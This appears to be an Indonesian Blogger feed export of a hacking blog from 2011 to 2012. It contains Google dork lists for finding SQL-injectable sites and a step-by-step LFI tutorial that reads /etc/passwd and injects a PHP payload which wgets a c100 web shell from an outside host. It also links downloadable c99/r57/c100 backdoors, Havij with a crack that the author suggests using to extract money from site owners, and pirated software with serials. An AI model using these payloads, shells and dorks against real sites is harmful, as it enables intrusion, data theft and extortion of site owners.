tag:blogger.com,1999:blog-41054987708194274562024-03-21T00:42:11.291-07:00CyberZoidchoicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-4105498770819427456.post-74870228055093451792012-02-15T10:16:00.001-08:002012-02-15T10:16:49.734-08:00SQL injectioninurl:"id=" & intext:"Warning: mysql_fetch_assoc()<br />
inurl:"id=" & intext:"Warning: mysql_fetch_array()<br />
inurl:"id=" & intext:"Warning: mysql_num_rows()<br />
inurl:"id=" & intext:"Warning: session_start()<br />
inurl:"id=" & intext:"Warning: getimagesize()<br />
inurl:"id=" & intext:"Warning: is_writable()<br />
inurl:"id=" & intext:"Warning: getimagesize()<br />
inurl:"id=" & intext:"Warning: Unknown()<br />
inurl:"id=" & intext:"Warning: session_start()<br />
inurl:"id=" & intext:"Warning: mysql_result()<br />
inurl:"id=" & intext:"Warning: pg_exec()<br />
inurl:"id=" & intext:"Warning: mysql_result()<br />
inurl:"id=" & intext:"Warning: mysql_num_rows()<br />
inurl:"id=" & intext:"Warning: mysql_query()<br />
inurl:"id=" & intext:"Warning: array_merge()<br />
inurl:"id=" & intext:"Warning: preg_match()<br />
inurl:"id=" & intext:"Warning: ilesize()<br />
inurl:"id=" & intext:"Warning: filesize()<br />
inurl:"id=" & intext:"Warning: filesize()<br />
inurl:"id=" & intext:"Warning: require()choicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-50557327842101631612012-01-30T08:31:00.000-08:002012-01-30T08:31:49.157-08:00Uniblue PowerSuite 2012<b>Review of the Uniblue PowerSuite 2012</b><br />
<br />
Computer optimization is a necessary job that needs to be done to keep any Windows PC running at its peak performance. You would think that a computer could take care of itself by now but that is still not the case. The Operating System, by design, remembers things. The problem is that it does not know how to forget which creates clutter in the system, which in turn can slow a PC to a crawl if it is not cleaned out periodically. That maintenance, if done manually, can be a daunting task. This is where the UniBlue PowerSuite comes in handy.<br />
The PowerSuite 2012 combines three essential tools to keep a system optimized. <br />
<br />
SpeedUpMyPC does just what the name suggests, it speeds up your computer by removing forgotten and unnecessary files, settings and processes that slow the PC down. See the SpeedUpMyPC 2012 Review <br />
<br />
RegistryBooster cleans the registry of unneeded entries that can make a system slow and unstable. The registry is just like your brain and it is a terrible thing to clutter. See the RegistryBooster 2012 Review <br />
<br />
DriverScanner is the third piece to the puzzle. This program scans the PC for outdated system drivers that make a computer unstable and unresponsive and finds new and updated drivers to correct the issues found. See DriverScanner 2012 Review here. <br />
This review of the Uniblue PowerSuite 2012 will show the highlights of the powerful optimization suite. <br />
<br />
When the PowerSuite is first started, it gives you the option of when to scan your computer with the individual programs. The settings can be changed to your liking but the defaults look good to me. <br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4nnIQzcLFKnCm9ha6NbwhsrtfnHdhxUdLOsdVufuqtNDoRYO2_fhGoxZxH2MKV29tqva8kwx_fAf0tAcAfrraTn6vxc-JE095u8vV071SkmpGv6bH-_Wd7CmZZJREPv_TKbCNIdp8bH8/s1600/PowerSuite_2012_1.jpg" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="184" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4nnIQzcLFKnCm9ha6NbwhsrtfnHdhxUdLOsdVufuqtNDoRYO2_fhGoxZxH2MKV29tqva8kwx_fAf0tAcAfrraTn6vxc-JE095u8vV071SkmpGv6bH-_Wd7CmZZJREPv_TKbCNIdp8bH8/s320/PowerSuite_2012_1.jpg" /></a></div><br />
Once the program was launched, it automatically started to scan the computer so I figured that I would let it do its thing. Looks like it found 338 Registry Errors, 7,152 speed issues and 11 outdated drivers on this system. Here are the results.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsI3XpcSfujNxAJvluxJC5XP19dFMnf3_4X6veNA82i7xBmCWrqGQ5WXEJfnmR0i5lcXuPXtwqjXlmuqP77kqn8PKk5Ackwvy9mo1KjVskSTMahEAlnTsmFMQZTqbau-hwBWpPxIA_HQw/s1600/PowerSuite_2012_2.jpg" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="222" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsI3XpcSfujNxAJvluxJC5XP19dFMnf3_4X6veNA82i7xBmCWrqGQ5WXEJfnmR0i5lcXuPXtwqjXlmuqP77kqn8PKk5Ackwvy9mo1KjVskSTMahEAlnTsmFMQZTqbau-hwBWpPxIA_HQw/s320/PowerSuite_2012_2.jpg" /></a></div><br />
In order to fix the recommended problems, the individual applications need to be launched. I started with RegistryBooster. The program tells me that my Registry is having a cloudy day with the damage level at High with 338 errors so I smacked the Fix Errors link to start the job.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ZNh6ryk6p86JoRHK3OAL8JzqNMxzT4jVdXT8O98RzpTbMx7ZiICzS_foAFJCOvpwI4brp1u1p5kkl3loKqGNjDcBT43Hoa_UK7ut87nMmslwuJ4mte71zOWsW1uBtMA5_xyBl5XNaMM/s1600/PowerSuite_2012_3.jpg" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="212" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7ZNh6ryk6p86JoRHK3OAL8JzqNMxzT4jVdXT8O98RzpTbMx7ZiICzS_foAFJCOvpwI4brp1u1p5kkl3loKqGNjDcBT43Hoa_UK7ut87nMmslwuJ4mte71zOWsW1uBtMA5_xyBl5XNaMM/s320/PowerSuite_2012_3.jpg" /></a></div><br />
When it was finished, I went ahead and fixed the speed and driver issues as well. I ran all of the apps twice just for the fun of it and SpeedUpMyPC actually found a couple thousand more errors to fix, it fixed them as well. DriverScanner took a couple reboots to finish installing all of the drivers but that was expected.<br />
<br />
RegistryBooster, SpeedUpMyPC and DriverScanner all have many different management settings to use the programs as you desire but the PowerSuite, when installed, takes over and gives you all of the tools in one easy to use interface. All of the issues were fixed in a matter of minutes and the results are shown on the Uniblue PowerSuite main page. All is sunny, all is well.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F0IgoOA30FNqBcKy5NQJmk16k1PHLpEyF5okVupjt6hOgEoD_hbHLOsZMthNQ_j-TcYiIjQOz-X575an4Boecqw6zHiBEuNt3ahwRoQUEKkMNPwjK_O_SOT9JisU2ORGxYUMbRP6_zA/s1600/PowerSuite_2012_4.jpg" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="232" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F0IgoOA30FNqBcKy5NQJmk16k1PHLpEyF5okVupjt6hOgEoD_hbHLOsZMthNQ_j-TcYiIjQOz-X575an4Boecqw6zHiBEuNt3ahwRoQUEKkMNPwjK_O_SOT9JisU2ORGxYUMbRP6_zA/s320/PowerSuite_2012_4.jpg" /></a></div><br />
As you can see from this review of the Uniblue PowerSuite, it is a very easy to use program that fixes just about any imaginable problem that may plague a computer system. Driver updates are a necessity but a pain to do manually, cleaning out the clutter that the PC accumulates is quite a task but still needs to be done and cleaning out the computers brain, or Registry, should not be done by the inexperienced but needs to be done to keep your computer running fast and stable. The PowerSuite does it all and it is a Microsoft Gold Certified utility so you know it can be trusted.<br />
<br />
As with all of the previous reviews of Uniblue products, The PowerSuite does what it claims to do quickly and easily without harming your computer and is a reasonably priced utility. For that reason, the Uniblue PowerSuite gets an Honorable Brontobyte on a scale of Bytes to Brontobytes.<br />
<br />
Download Uniblue PowerSuite 2012 + Serial Number <a href="http://www.4shared.com/zip/7j9WIomy/PowerSuite_2012.html" target=_blank">disini</a>choicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-38317330566723932932012-01-28T09:53:00.000-08:002012-01-28T09:58:05.356-08:00Cara mengunci folder (password)Cara mengunci folder (passsword) dengan type bat file, copy dan paste script dibawah ini dalam notepad, kemudian save as privatefolder.bat<br />
<br />
<i>cls<br />
@ECHO OFF<br />
title Folder privatefolder<br />
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK<br />
if NOT EXIST privatefolder goto MDLOCKER<br />
:CONFIRM<br />
echo Apakah Anda ingin mengunci privatefolder tersebut ? (Y/N)<br />
set/p "cho=>"<br />
if %cho%==Y goto LOCK<br />
if %cho%==y goto LOCK<br />
if %cho%==n goto END<br />
if %cho%==N goto END<br />
echo Ketik Y atau N.<br />
goto CONFIRM<br />
:LOCK<br />
ren Software "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"<br />
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"<br />
echo privatefolder Terkunci<br />
goto End<br />
:UNLOCK<br />
echo Masukkan Password untuk membuka kunci<br />
set/p "pass=>"<br />
if NOT %pass%== 0x3a4 goto FAIL<br />
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"<br />
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" privatefolder<br />
echo privatefolder sudah di buka<br />
goto End<br />
:FAIL<br />
echo Password salah<br />
goto end<br />
:MDLOCKER<br />
md Software<br />
echo privatefolder Sukses di buat<br />
goto End<br />
:End</i><br />
<br />
untuk password silahkan cari baris script berikut <i>if NOT %pass%== 0x3a4 goto FAIL</i> "0x3a4" <= bisa diganti sesuai selera masing2 hiii...(kayak makan aja),
Nah saya rasa agan sudah save file tersebut dalam file type bat, kemudian double klik privatefolder.bat nah ntar akan membuat folder sendiri "privatefolder"
untuk mengunci kembali tinggal double klik file tersebut kemudian tekan "Y/y"
yang gak mau repot bisa didownload <a href="http://www.4shared.com/file/Cj8MX0m8/PrivateFolder.html" target=_blank"><i>disini</i></a>choicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-88652525538715831112012-01-28T09:38:00.000-08:002012-01-28T09:38:39.996-08:00DNS jumper v 1.0.4DNS jumper v 1.0.4 salah satu software yang dapat membatu kita browsing <br />
dimana salah satu cara menyiasati blokiran entah dari telkom atau nawala DNS<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhblgnm7CETUnwZGFE6S0I5R9klrj4gnUVJhigWUvR-8JEn8CnShnyS2XxOQvHhfWgg4ZQt0xNifJow1uShkdqkPEeGZbNdbHq4qUAkpkDW3v94DcI6Q5UPcySlWc-klloqQiDk6tahLxs/s1600/dns+jumper.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="161" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhblgnm7CETUnwZGFE6S0I5R9klrj4gnUVJhigWUvR-8JEn8CnShnyS2XxOQvHhfWgg4ZQt0xNifJow1uShkdqkPEeGZbNdbHq4qUAkpkDW3v94DcI6Q5UPcySlWc-klloqQiDk6tahLxs/s320/dns+jumper.jpg" /></a></div>ok langsung download saja <a href="http://www.4shared.com/zip/1RhKGj8h/DNS_Jumper.html" target=_blank"><i>disin</i>i</a><br />
kemudian Cara menggunakan DNS Jumper :<br />
1. Download DNS Jumper<br />
2. Ekstrak (keluarkan file dari zip) ke desktop atau kemana aja.<br />
3. Jalankan DNS Jumper<br />
4. Pilih Network card (sesuaikan dengan komputer anda)<br />
5. Pilih DNS Service yang akan kita gunakan di menu dropdown.<br />
6. Klik apply DNS.<br />
7. Done.choicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-71987643956655223692011-11-27T20:53:00.000-08:002012-01-30T08:05:58.089-08:00IDM Full Version 6.07 + Patch + plugin suport firefox8<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeMoLkQOGN2UW4d37yAXzqHJ4-RLqaZQqiGQDfhcuRuF80_J8-YdgXOHtqezR7nT-utjoOcIADbakZGpCUQjdz5DGS5d3A6pDUggRV5f5_rWbbAfqrlpHRZeFbHPVdXcVyAKMWtqJ34m0/s1600/8a8c750119f2779314e9ca9f366751c6.jpg" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="211" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeMoLkQOGN2UW4d37yAXzqHJ4-RLqaZQqiGQDfhcuRuF80_J8-YdgXOHtqezR7nT-utjoOcIADbakZGpCUQjdz5DGS5d3A6pDUggRV5f5_rWbbAfqrlpHRZeFbHPVdXcVyAKMWtqJ34m0/s320/8a8c750119f2779314e9ca9f366751c6.jpg" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-kgCRWfHrd304xiSTkk7O4PV7EUy3DHFH_Rd_fJrAyFuzempXezapHhyonijg_u7f18Yxr8me81o53lakWDhyphenhyphenJiCtbYfHcvlK8jZg3OfJaaALXHI3Edhyphenhyphenk5BWcs-UO8Lp_x0crsv8X5E/s1600/patch-idm-605.gif" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="320" width="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-kgCRWfHrd304xiSTkk7O4PV7EUy3DHFH_Rd_fJrAyFuzempXezapHhyonijg_u7f18Yxr8me81o53lakWDhyphenhyphenJiCtbYfHcvlK8jZg3OfJaaALXHI3Edhyphenhyphenk5BWcs-UO8Lp_x0crsv8X5E/s320/patch-idm-605.gif" /></a></div><=lihat patch
Kali ini saya tidak share tools hacking, nah sekarng saya share IDM alias Internet Download Manager yang full versions + dengan plugin idm cc 7.3.8 buat firefox 8...
langsung saja menuju TKP download <a href="http://www.4shared.com/zip/mKSvYMyC/IDM_Full_Version_607__Patch__p.html" target=_blank">disini</a> gan...<br />
untuk plugin idm cc 7.3.8 <a href="http://www.4shared.com/file/1du17_UU/idm_cc_738.html" target=_blank">disini</a><br />
<br />
Kemudian untuk IDM yang new update (IDM 6.08 Build 8) bisa didapatkan <a href="http://www.4shared.com/zip/S621iJ9H/IDM_608_Build_8.html" target=_blank">disini</a><br />
patch baru untuk IDM 6.08 Build 8<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kU8gGrCY3co9h-ETT4o361E__-fFd3k81myiPx_RnIFQm0qToP8ZQ16yH9l4mpbZn_VVI5ZthV8lCuV5xRhXplINLWx0IFZADbHtbtxsB7qWQ8bO_XFELbXxASTbRwlo4ETYVOIrU9s/s1600/id.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="285" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kU8gGrCY3co9h-ETT4o361E__-fFd3k81myiPx_RnIFQm0qToP8ZQ16yH9l4mpbZn_VVI5ZthV8lCuV5xRhXplINLWx0IFZADbHtbtxsB7qWQ8bO_XFELbXxASTbRwlo4ETYVOIrU9s/s320/id.png" /></a></div>choicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-69086324363274321092011-10-17T07:25:00.001-07:002011-10-17T07:25:05.030-07:00Stop sejenakTerlalu byk tugas jd terlupakan blog anechoicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-79873655002245576262011-09-05T00:17:00.000-07:002011-09-05T00:17:17.435-07:00Tanam Shell via LFI dengan Metode Proc/Self/EnvironDalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas sebelumnya di website milw0rm pada paper ke 361.<br />
Ok kita langsung saja…<br />
<br />
1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.<br />
contoh : http://site.com/info.php?file=news.php<br />
<br />
2. coba kita ganti “news.php” dengan “../../../”.<br />
contoh : http://site.com/info.php?file=../../../<br />
lalu kita mendapat error, seperti berikut…<br />
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99<br />
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.<br />
selanjutanya kita coba temukan /etc/passwd.<br />
contoh : http://site.com/info.php?file=etc/passwd<br />
Tetapi kita masih mendapat error seperti berikut :<br />
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99<br />
bagaimana jika kita naikan directorynya ?<br />
mari kita coba…<br />
contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd<br />
oke gan :D kita mendapatkan file /etc/passwd yang terlihat seperti berikut :<br />
<br />
root:x:0:0:root:/root:/bin/bash<br />
daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />
bin:x:2:2:bin:/bin:/bin/sh<br />
sys:x:3:3:sys:/dev:/bin/sh<br />
sync:x:4:65534:sync:/bin:/bin/sync<br />
games:x:5:60:games:/usr/games:/bin/sh<br />
man:x:6:12:man:/var/cache/man:/bin/sh<br />
lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />
mail:x:8:8:mail:/var/mail:/bin/sh<br />
news:x:9:9:news:/var/spool/news:/bin/sh<br />
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />
proxy:x:13:13:proxy:/bin:/bin/sh<br />
www-data:x:33:33:www-data:/var/www:/bin/sh<br />
backup:x:34:34:backup:/var/backups:/bin/sh<br />
list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />
irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br />
libuuid:x:100:101::/var/lib/libuuid:/bin/sh<br />
syslog:x:101:102::/home/syslog:/bin/false<br />
klog:x:102:103::/home/klog:/bin/false<br />
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false<br />
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false<br />
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false<br />
saned:x:106:113::/home/saned:/bin/false<br />
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false<br />
messagebus:x:108:117::/var/run/dbus:/bin/false<br />
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false<br />
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false<br />
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false<br />
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash<br />
snmp:x:112:65534::/var/lib/snmp:/bin/false<br />
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash<br />
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin<br />
<br />
3. mari kita check apakah /proc/self/environ bisa kita akses ?<br />
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”<br />
contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ<br />
Jika anda mendapatkan yang seperti ini :<br />
<br />
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,<br />
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,<br />
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac<br />
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd<br />
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15<br />
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron<br />
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665<br />
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron<br />
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php<br />
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com<br />
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=<br />
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k<br />
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80<br />
Ternyata proc/self/environ dapat kita akses !<br />
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD<br />
<br />
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.<br />
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966<br />
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”<br />
lalu pada user-agent isikan dengan kode berikut :<br />
<?system(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?><br />
atau<br />
<?exec(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?><br />
lalu submit.<br />
<br />
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.<br />
http://www.site.com/shell.php<br />
<br />
dari berbagai sumber dan hasil praktek sendirichoicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-7505368188329116942011-09-05T00:08:00.000-07:002011-09-05T00:08:10.099-07:00Shell r57, c99, c100 (backdoor)Dengan adanya RFI attacker dapat menyerang sebuah site lewat Shell (c99/c100/r57), nah Shell itu disebut juga Backdoor (pintu belakang) :D<br />
ok silahkan agan sedot shell backdoor:<br />
<a href="http://www.4shared.com/file/6dOJV7RW/c99.html" target="_blank">c99</a><br />
<a href="http://www.4shared.com/file/t5WGXnlr/home.html" target="_blank">Explore</a><br />
<a href="http://www.4shared.com/file/wOIjmA1x/r57.html" target="_blank">r57</a><br />
<a href="http://www.4shared.com/file/Avm2MGq-/c100.html" target="_blank">c100</a><br />
note:<br />
gunakan dengan bijak<br />
<br />
<br />
<br />
<br />
<br />
<br />
choicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-15983182661985877262011-08-31T12:42:00.000-07:002011-08-31T12:42:04.368-07:00XCode Exploit Scanner Sept 2011<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiauiICBfjwFm2wuZGzK0KeMc5gWOs5XAzf82NSmwlJjLYnwWohALyPdI4MZWKdxmrTIrNkzLjVo1LflDELGlAZoEY7E2nr3zIXD0Uug8gEkT8jjGLC0Kk1BP_DCAqJ-nQcsbJGmZPz2o4/s1600/Untitled.png" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="187" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiauiICBfjwFm2wuZGzK0KeMc5gWOs5XAzf82NSmwlJjLYnwWohALyPdI4MZWKdxmrTIrNkzLjVo1LflDELGlAZoEY7E2nr3zIXD0Uug8gEkT8jjGLC0Kk1BP_DCAqJ-nQcsbJGmZPz2o4/s320/Untitled.png" /></a></div><br />
waaw....tools ini sangat membantu buat yg hoby hacking...<br />
hemm....buat cari dork hihihi :D, trus kelebihannya sendiri langsung ketarget sasaran yang Vulnerable :D hohoho...<br />
untuk lebih singkatnya agan langsung praktek aja deh, eits...toolsnya udah punya blm? kalo blm silahkan sedot <a href="http://www.4shared.com/file/PlhwXTor/XCodeExploitScannerSept2011.html" target="_blank"> disini</a><br />
suport windows xp kalo yang pake windows 7 tetep masih bisa caranya <br />
1. klik kanan XCodeXploitScanner.exe<br />
2. kemudian properties<br />
3. pilih Compatibility<br />
4. kemudian beri tanda ceklis di "run this program compatibility mode for:"<br />
5. untuk dibagian combobox pilih windows xp (service pack 3)<br />
6. ok, dan siap dipakechoicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-29051807843772081772011-08-22T08:01:00.000-07:002011-08-22T08:06:18.098-07:00Tools HackingIni gan....ane mau share tools hacking yg simple gak usah maen kebrowser mulu ea tapi cari dork lewat browser heee :P dengan tools ini agan bisa masuk ke database suatu web dan terlebih lagi dapetin username admin dan password ato gak uername Cpanel dan password, kalo agan baik musti bisa gunain ini dengan baik hiiii :D biar dapat duit gitu dari si pemilik web. ya udah langsung aja sedot tools ini<br />
ini screenshotnya <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifcBaBmHuUIaPu13Hy6p7SdOz_gzK1_UDuxzAkPAGJObXKTwuDaGhBIXOFPyW2jf2V9h1ot5VMtQx2oAZwD7iAEEk8Lixqidk_ATzt_ZSNcv1WKCSv2__ndvyhw7Knqyb1ogzEj9e_nQQ/s1600/ehem.png" imageanchor="1" style="clear:left; float:left;margin-right:1em; margin-bottom:1em"><img border="0" height="187" width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifcBaBmHuUIaPu13Hy6p7SdOz_gzK1_UDuxzAkPAGJObXKTwuDaGhBIXOFPyW2jf2V9h1ot5VMtQx2oAZwD7iAEEk8Lixqidk_ATzt_ZSNcv1WKCSv2__ndvyhw7Knqyb1ogzEj9e_nQQ/s320/ehem.png" /></a></div>1. Havij 1.4 <a href="http://www.itsecteam.com/files/havij/Havij1.14Free.rar" target="_blank">disini</a><br />
2.terakhir sedot dah cracknya <a href="http://www.4shared.com/file/9_HWYaIb/Havij.html" target="_blank">disini</a><br />
<br />
untuk cara gunain tools ini mudah banget kok, adapun kalo agan bingun bisa langsung tanya ke mbah google okchoicehttp://www.blogger.com/profile/04264076808117854301noreply@blogger.com0tag:blogger.com,1999:blog-4105498770819427456.post-81462418433074960672011-08-19T00:51:00.000-07:002011-08-19T00:51:14.752-07:00Google dorks 2011inurl:index.php?id=<br />
inurl:trainers.php?id=<br />
inurl:buy.php?category=<br />
inurl:article.php?ID=<br />
inurl:play_old.php?id=<br />
inurl:declaration_more.php?decl_id=<br />
inurl:Pageid=<br />
inurl:games.php?id=<br />
inurl:page.php?file=<br />
inurl:newsDetail.php?id=<br />
inurl:gallery.php?id=<br />
inurl:article.php?id=<br />
inurl:show.php?id=<br />
inurl:staff_id=<br />
inurl:newsitem.php?num=<br />
inurl:readnews.php?id=<br />
inurl:top10.php?cat=<br />
inurl:historialeer.php?num=<br />
inurl:reagir.php?num=<br />
inurl:forum_bds.php?num=<br />
inurl:game.php?id=<br />
inurl:view_product.php?id=<br />
inurl:newsone.php?id=<br />
inurl:sw_comment.php?id=<br />
inurl:news.php?id=<br />
inurl:avd_start.php?avd=<br />
inurl:event.php?id=<br />
inurl:product-item.php?id=<br />
inurl:sql.php?id=<br />
inurl:news_view.php?id=<br />
inurl:select_biblio.php?id=<br />
inurl:humor.php?id=<br />
inurl:aboutbook.php?id=<br />
inurl:fiche_spectacle.php?id=<br />
inurl:communique_detail.php?id=<br />
inurl:sem.php3?id=<br />
inurl:kategorie.php4?id=<br />
inurl:news.php?id=<br />
inurl:index.php?id=<br />
inurl:faq2.php?id=<br />
inurl:show_an.php?id=<br />
inurl:preview.php?id=<br />
inurl:loadpsb.php?id=<br />
inurl:opinions.php?id=<br />
inurl:spr.php?id=<br />
inurl:pages.php?id=<br />
inurl:announce.php?id=<br />
inurl:clanek.php4?id=<br />
inurl:participant.php?id=<br />
inurl:download.php?id=<br />
inurl:main.php?id=<br />
inurl:review.php?id=<br />
inurl:chappies.php?id=<br />
inurl:read.php?id=<br />
inurl:prod_detail.php?id=<br />
inurl:viewphoto.php?id=<br />
inurl:article.php?id=<br />
inurl:person.php?id=<br />
inurl:productinfo.php?id=<br />
inurl:showimg.php?id=<br />
inurl:view.php?id=<br />
inurl:website.php?id=<br />
inurl:hosting_info.php?id=<br />
inurl:gallery.php?id=<br />
inurl:rub.php?idr=<br />
inurl:view_faq.php?id=<br />
inurl:artikelinfo.php?id=<br />
inurl:detail.php?ID=<br />
inurl:index.php?=<br />
inurl:profile_view.php?id=<br />
inurl:category.php?id=<br />
inurl:publications.php?id=<br />
inurl:fellows.php?id=<br />
inurl:downloads_info.php?id=<br />
inurl:prod_info.php?id=<br />
inurl:shop.php?do=part&id=<br />
inurl:Productinfo.php?id=<br />
inurl:collectionitem.php?id=<br />
inurl:band_info.php?id=<br />
inurl:product.php?id=<br />
inurl:releases.php?id=<br />
inurl:ray.php?id=<br />
inurl:produit.php?id=<br />
inurl:pop.php?id=<br />
inurl:shopping.php?id=<br />
inurl:productdetail.php?id=<br />
inurl:post.php?id=<br />
inurl:viewshowdetail.php?id=<br />
inurl:clubpage.php?id=<br />
